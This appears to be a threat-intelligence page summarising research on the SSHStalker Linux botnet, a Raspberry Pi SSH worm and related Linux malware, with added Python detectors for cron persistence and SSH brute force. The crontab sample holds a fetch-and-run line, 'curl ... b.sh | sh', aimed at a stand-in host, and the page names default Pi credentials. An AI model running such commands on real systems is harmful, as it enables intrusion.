Mallory

SSHStalker Linux Botnet Uses SSH Brute Force and Legacy Exploits for Dormant Persistence

Tags: exploit chains, dormant persistence, botnet, honeypots, ddos, ssh, credential stuffing, linux, brute force, legacy exploits, persistence, perl, cryptomining, on-host compilation
Updated February 13, 2026 at 02:01 AM · 3 sources

Researchers reported a previously undocumented Linux botnet dubbed SSHStalker that has compromised roughly 7,000 systems by combining SSH credential brute-forcing/scanning with legacy (circa-2009) exploit chains and highly automated staging. The activity was observed over multiple weeks via SSH honeypots, with intrusions characterized by rapid deployment, on-host compilation, and automated enrollment into command infrastructure, indicating an operation optimized for mass compromise rather than targeted intrusion.

SSHStalker uses IRC-based command-and-control and a mixed toolkit that includes C-based bots, Perl scripts, and known botnet malware families such as Tsunami and Keiten. Reporting highlighted an unusual “dormant persistence” pattern: infected hosts are kept under control without immediate visible monetization or impact operations, despite having capabilities associated with DDoS and cryptomining. Persistence is described as noisy but effective, including cron-based relaunch behavior that can restore the malware within about a minute after disruption, suggesting the operator may be staging infrastructure or retaining access for future use.
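The cron-based relaunch behaviour described above is something a defender can hunt for directly in crontab output. The following is an added example written for this page, not tooling or indicators from Flare or Mallory: it parses user-crontab lines and flags entries that combine an every-minute or at-boot schedule with execution from a scratch directory, a hidden path component, or a pipe into a shell. The heuristics, the `SAMPLE_CRONTAB` lines and the address `198.51.100.7` (a documentation-range address) are constructed for illustration.

```python
"""Flag crontab entries that match the relaunch-style persistence pattern
described in the SSHStalker reporting (every-minute jobs that re-spawn a
bot from a scratch directory).  Added example; the heuristics, names and
sample lines below are the editor's constructed illustration, not tooling
or indicators from Flare or Mallory."""
import re
from dataclasses import dataclass, field

# World-writable scratch locations that legitimate cron jobs rarely execute from.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]")            # a "/.name" path component
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
SILENCED = re.compile(r">\s*/dev/null\s+2>&1")

# Constructed sample user crontab (not a real capture); 198.51.100.7 is a
# documentation-range address standing in for a staging host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh
* * * * * /tmp/.x/run.sh >/dev/null 2>&1
* * * * * /dev/shm/.cache/bot || curl -s http://198.51.100.7/b.sh | sh
@reboot /var/tmp/.ssh/kthreadd
"""

@dataclass
class CronEntry:
    schedule: str
    command: str
    reasons: list = field(default_factory=list)

def parse_crontab(text):
    """Parse user-crontab syntax (5 time fields or an @keyword, then the command)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                entries.append(CronEntry(parts[0], parts[1]))
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            entries.append(CronEntry(" ".join(parts[:5]), parts[5]))
    return entries

def assess(entry):
    """Attach human-readable reasons; each is only a weak signal on its own."""
    reasons = []
    if entry.schedule == "* * * * *":
        reasons.append("runs every minute (relaunch-style persistence)")
    elif entry.schedule == "@reboot":
        reasons.append("runs at boot")
    if any(d in entry.command for d in SCRATCH_DIRS):
        reasons.append("executes from a world-writable scratch directory")
    if HIDDEN_PATH.search(entry.command):
        reasons.append("references a hidden path component")
    if PIPE_TO_SHELL.search(entry.command):
        reasons.append("pipes fetched content into a shell")
    if SILENCED.search(entry.command):
        reasons.append("discards all output")
    entry.reasons = reasons
    return reasons

def find_suspicious(text, min_reasons=2):
    """Return {command: reasons} for entries with at least min_reasons signals.
    Requiring two signals keeps a lone 'discards all output' job from alerting."""
    hits = {}
    for entry in parse_crontab(text):
        if len(assess(entry)) >= min_reasons:
            hits[entry.command] = entry.reasons
    return hits

if __name__ == "__main__":
    for cmd, why in find_suspicious(SAMPLE_CRONTAB).items():
        print(cmd, "->", "; ".join(why))
```

On a live host, feed the output of `crontab -l` for each user into `find_suspicious`; system crontabs under `/etc/cron.d` carry an extra user field and need the parser adjusted. Because the reported relaunch restores the malware within about a minute, the crontab entry must be removed before the running process is killed, or the job simply re-creates it.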

Related Stories

New Botnet Research Highlights Linux SSH Compromise and SystemBC Proxy Malware at Scale

New threat research described two distinct botnet operations expanding through mass compromise. Flare reported a previously undocumented Linux botnet it dubbed **SSHStalker**, observed via an SSH honeypot and characterized by *IRC-based* command-and-control with multiple bot variants (including legacy families such as **Tsunami** and **Keiten**), automated scanning and staging (including a Golang scanner masquerading as `nmap` behavior and a compile-and-run workflow), and noisy but effective persistence via `cron` jobs that can re-establish the bot within roughly a minute if not fully removed. The tooling also included log-tampering artifacts (e.g., `utmp/wtmp/lastlog` manipulation) and a “back-catalog” of older Linux 2.6-era exploits, suggesting the operator is targeting long-tail, poorly maintained infrastructure; Flare noted playbook similarities to **Outlaw/Maxlas**-style operations but did not claim definitive attribution.

Separately, reporting on a Silent Push analysis described a large **SystemBC** (aka **Coroxy/DroxiDat**) botnet comprising **10,000+** infected IPs globally, with notable concentrations in the US and additional presence across Europe and Asia. SystemBC is described as **SOCKS5 proxy malware** commonly used by threat actors to mask downstream activity and historically associated with enabling ransomware deployment; the report highlighted infections linked to **government-related domains** based on passive DNS observations, indicating potential exposure of sensitive environments even when immediate follow-on payloads were not directly observed.

A third article provided general technical background on how internet-wide scanners (e.g., Shodan/Censys-style platforms) perform active service identification and banner grabbing; it is contextual but does not report on either botnet operation specifically.

1 month ago
Self-Propagating SSH Worm Building an IRC Botnet via Default Raspberry Pi Credentials

Internet Storm Center (ISC) researchers reported a **self-propagating SSH worm** observed by a DShield honeypot sensor that can compromise exposed Linux systems in roughly **four seconds** by using **credential stuffing/brute force** against weak SSH passwords, with a notable focus on *Raspberry Pi* devices left on default or common credentials (e.g., user `pi` with passwords such as `raspberry` and `raspberryraspberry993311`). The observed attack chain rapidly authenticates, uploads a compact **4.7 KB bash script** (via SCP), executes it, and establishes persistence while removing competing malware, enabling worm-like exponential spread across vulnerable internet-connected hosts. Technical analysis indicates the activity likely originated from an already-compromised *Raspberry Pi* in Germany (IP `83.135.10.12`, Versatel Deutschland), using an SSH client string consistent with Raspbian (`SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1`) and a recorded HASSH fingerprint `ae8bd7dd09970555aa4c6ed22adbbf56`. Post-compromise, the malware connects to **IRC-based command-and-control** and includes **cryptographically signed command verification**; it also automates scanning and lateral movement using tools such as **Zmap** and **sshpass**, reinforcing how default/weak SSH authentication on IoT and small-form-factor Linux systems remains a high-impact botnet entry point.
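The rapid brute-force-then-login sequence described in this story leaves a recognisable trace in a host's sshd log. The following is an added example written for this page, not ISC/DShield data or tooling: it parses syslog-style sshd lines, finds source addresses that exceed a failure threshold inside a short window, records which accounts they tried, and reports whether a password login from the same source succeeded once the burst had begun. The `SAMPLE_AUTH_LOG` lines, the `DEFAULT_ACCOUNTS` watch-list and the `192.0.2.0/24` addresses are constructed for illustration.

```python
"""Detect the SSH brute-force-then-success pattern described for the
Raspberry Pi worm in a host's sshd log.  Added example by the editor; the
log lines, account watch-list and thresholds are constructed for
illustration and are not ISC/DShield data or tooling."""
import re
from collections import defaultdict
from datetime import datetime

# Syslog-style sshd lines; the year is absent, so this assumes one calendar day.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Accepted|Failed)\s(?P<method>\w+)\sfor\s(?:invalid user\s)?"
    r"(?P<user>\S+)\sfrom\s(?P<ip>\S+)\sport\s\d+"
)

# Constructed watch-list of accounts that ship with default passwords on
# small Linux boards; extend it with your own image defaults.
DEFAULT_ACCOUNTS = {"pi", "root", "admin"}

# Constructed sample log (192.0.2.0/24 is a documentation range).
SAMPLE_AUTH_LOG = """\
Jan 20 10:00:01 rpi sshd[1201]: Failed password for pi from 192.0.2.10 port 40210 ssh2
Jan 20 10:00:02 rpi sshd[1202]: Failed password for pi from 192.0.2.10 port 40211 ssh2
Jan 20 10:00:02 rpi sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 40212 ssh2
Jan 20 10:00:03 rpi sshd[1204]: Failed password for pi from 192.0.2.10 port 40213 ssh2
Jan 20 10:00:04 rpi sshd[1205]: Accepted password for pi from 192.0.2.10 port 40214 ssh2
Jan 20 10:00:04 rpi sshd[1205]: pam_unix(sshd:session): session opened for user pi(uid=1000) by (uid=0)
Jan 20 10:15:30 rpi sshd[1300]: Accepted publickey for alice from 192.0.2.50 port 51000 ssh2
Jan 20 10:20:00 rpi sshd[1310]: Failed password for root from 192.0.2.77 port 3333 ssh2
"""

def parse_line(line):
    """Return an auth event dict, or None for lines that are not auth results."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "result": m["result"], "method": m["method"],
        "user": m["user"], "ip": m["ip"],
    }

def first_burst(fails, threshold, window_s):
    """Earliest run of `threshold` failures spanning <= window_s seconds,
    returned as (start_ts, end_ts) or None.  `fails` must be time-sorted."""
    for i in range(len(fails) - threshold + 1):
        j = i + threshold - 1
        if (fails[j]["ts"] - fails[i]["ts"]).total_seconds() <= window_s:
            return fails[i]["ts"], fails[j]["ts"]
    return None

def analyze(lines, threshold=3, window_s=60):
    """Per source IP: did it burst past `threshold` failures, which accounts did
    it try, and did a password login succeed once the burst had begun?"""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        fails = [e for e in events if e["result"] == "Failed"]
        burst = first_burst(fails, threshold, window_s)
        if burst is None:
            continue
        start, _ = burst
        users = {e["user"] for e in fails}
        findings[ip] = {
            "failed_attempts": len(fails),
            "targeted_users": sorted(users),
            "default_accounts_targeted": sorted(users & DEFAULT_ACCOUNTS),
            "password_accepted_after_burst": any(
                e["result"] == "Accepted" and e["method"] == "password" and e["ts"] >= start
                for e in events),
        }
    return findings

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, finding)
```

A `password_accepted_after_burst` hit is the case that matters: a source that guessed its way in within seconds, exactly the four-second compromise this story describes. Treat the host as compromised rather than merely probed, and note that a key-based login such as the `alice` line is never counted, which is one more reason to disable password authentication in `sshd_config` on exposed devices.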

1 month ago
Research Highlights Malware and Post-Compromise Abuse Targeting Linux Network and Server Infrastructure

Security researchers reported several distinct but related findings showing how attackers are abusing **Linux-based infrastructure** for botnets, cryptomining, and post-compromise operations. Eclypsium identified a new **CondiBot** variant labeled `QTXBOT` and a previously undocumented **Monaco** cryptominer targeting network devices and exposed SSH services, with Monaco using brute-force access and exfiltrating stolen credentials to a command-and-control server hosted on Alibaba Cloud Singapore. Separately, Hunt.io exposed an Iranian-operated relay and botnet environment through an open directory, revealing a **15-node** tunnel network, SSH-based mass deployment tooling, on-host compilation of DDoS malware, and active command-and-control infrastructure. Flare also documented how threat actors repeatedly use the legitimate open-source script **Bench.sh** after initial access to profile compromised systems, including JupyterLab, Jupyter Notebook, SSH, Apache Tomcat, and PHP-based environments, in order to assess CPU, memory, disk, and bandwidth for follow-on abuse such as cryptomining, proxying, or DDoS. The reporting does **not** describe a single shared intrusion campaign: the CondiBot/Monaco discovery, the Iranian botnet infrastructure exposure, and Bench.sh abuse are separate research items connected by the broader theme of attackers operationalizing compromised Linux and network infrastructure. A separate report on **FancyBear/APT28** email theft and a general weekly security recap are different topics and should be excluded.

Today

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.